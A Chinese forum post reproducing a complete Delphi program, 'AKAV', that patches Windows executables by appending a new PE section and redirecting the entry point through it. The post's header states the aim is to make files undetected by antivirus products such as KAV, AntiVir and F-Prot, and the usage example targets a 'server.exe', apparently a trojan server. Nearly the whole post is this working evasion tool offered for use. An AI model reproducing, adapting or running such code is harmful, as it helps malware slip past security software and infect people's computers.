HanDs
管理员

[Delphi文章] 添加新节 



添加节,相当于加花那样.

{  
 
[Anti]KAV Unit by ErazerZ  
5th January 2006  
Web: http://www.gateofgod.com  
E-Mail: [email protected]  
 
This program bypass: KAV, AntiVir, F-Prot, and some other AVs ...  
Mostly users still think KAV is still best AV, but times changed, i made this  
Application to show users that KAV became (or was always) very bad.  
A simple EntryPoint move can make a Application undetected. That isnt secure  
anymore, people should better begin to use AVs with Heuristics like NOD32, VBA32,  
BitDefender and make their PCs more secure. ;)  
 
THIS IS A OPENSOURCE PROJECT, LEARN FROM IT OR DIE TRYIN :)  
 
}  
  
program AKAV;   
  
{$APPTYPE CONSOLE}  
  
uses  
Windows;   
  
function AddSection(FileName: String; SectionName: String): Boolean;   
const  
SectionCode: Array[0..6] of Byte = (   
$B8, $00, $00, $00, $00, // MOV EAX, $00000000   
$FF, $E0); // JMP EAX   
var  
i: ShortInt;   
hFile: THandle;   
DosHeader: TImageDosHeader;   
NtHeaders: TImageNtHeaders;   
SectionHeader, NewSection: TImageSectionHeader;   
dwOldEntryPoint, dwReadBytes, dwWrittenBytes: DWORD;   
begin  
Result := False;   
// Read DOS Header   
hFile := CreateFile(PChar(FileName), GENERIC_ALL, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);   
if hFile = 0 then  
begin  
CloseHandle(hFile);   
Exit;   
end;   
SetFilePointer(hFile, 0, nil, FILE_BEGIN);   
ReadFile(hFile, DosHeader, sizeof(DosHeader), dwReadBytes, nil);   
if dwReadBytes = sizeof(DosHeader) then  
begin  
// Read Nt Header   
SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);   
ReadFile(hFile, NtHeaders, sizeof(NtHeaders), dwReadBytes, nil);   
if dwReadBytes = sizeof(NtHeaders) then  
begin  
// Read Section Header   
SetFilePointer(hFile, sizeof(SectionHeader) * (NtHeaders.FileHeader.NumberOfSections -1), nil, FILE_CURRENT);   
ReadFile(hFile, SectionHeader, sizeof(SectionHeader), dwReadBytes, nil);   
if dwReadBytes = sizeof(SectionHeader) then  
begin  
// New Section   
if SectionName = '' then  
SectionName := '.EDI';   
// Section Name   
for i := 0 to 7 do  
NewSection.Name[i] := Byte(SectionName[i +1]);   
// The options of the Section   
NewSection.VirtualAddress := NtHeaders.OptionalHeader.SizeOfImage;   
NewSection.Misc.VirtualSize := $200;   
NewSection.SizeOfRawData := (NewSection.VirtualAddress div NtHeaders.OptionalHeader.FileAlignment +1) *   
NtHeaders.OptionalHeader.FileAlignment - NtHeaders.OptionalHeader.SizeOfImage;   
NewSection.PointerToRawData := SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData;   
NewSection.Characteristics := $E0000020;   
Inc(NtHeaders.FileHeader.NumberOfSections);   
  
// Write new Section   
WriteFile(hFile, NewSection, sizeof(NewSection), dwWrittenBytes, nil);   
if dwWrittenBytes = sizeof(NewSection) then  
begin  
// New Entrypoint   
dwOldEntryPoint := NtHeaders.OptionalHeader.AddressOfEntryPoint + NtHeaders.OptionalHeader.ImageBase;   
NtHeaders.OptionalHeader.AddressOfEntryPoint := NewSection.VirtualAddress;   
// change the SectionCode "EntryPoint"   
PDWORD(DWORD(@SectionCode) +1)^ := dwOldEntryPoint;   
// write the new sizeofimage   
NtHeaders.OptionalHeader.SizeOfImage := NtHeaders.OptionalHeader.SizeOfImage + NewSection.Misc.VirtualSize;   
SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);   
WriteFile(hFile, NtHeaders, sizeof(NtHeaders), dwWrittenBytes, nil);   
if dwWrittenBytes = sizeof(NtHeaders) then  
begin  
// write the new section   
SetFilePointer(hFile, GetFileSize(hFile, nil), nil, FILE_BEGIN);   
WriteFile(hFile, SectionCode, NewSection.Misc.VirtualSize, dwWrittenBytes, nil);   
if dwWrittenBytes = NewSection.Misc.VirtualSize then  
begin  
CloseHandle(hFile);   
Result := True;   
end else  
CloseHandle(hFile);   
end else  
CloseHandle(hFile);   
end else  
CloseHandle(hFile);   
end else  
CloseHandle(hFile);   
end else  
CloseHandle(hFile);   
end else  
CloseHandle(hFile);   
end;   
  
begin  
WriteLn;   
WriteLn('A[nti]KAV by ErazerZ');   
WriteLn('5th January 2006');   
WriteLn('Web: http://www.gateofgod.com');  
WriteLn('E-Mail: [email protected]');  
WriteLn;  
if (ParamStr(1) <> '') then  
begin  
if AddSection(ParamStr(1), ParamStr(2)) then  
WriteLn('File is patched!')  
else  
WriteLn('Error while patching!');  
end else  
begin  
WriteLn('Usage:' +#9#9+ 'AKAV.exe <your Application''s path> <your Section Name>');  
WriteLn('Example:' +#9+ 'AKAV.exe "c:\server.exe" ".ErazerZ"');   
end;   
end.   


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
添加
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复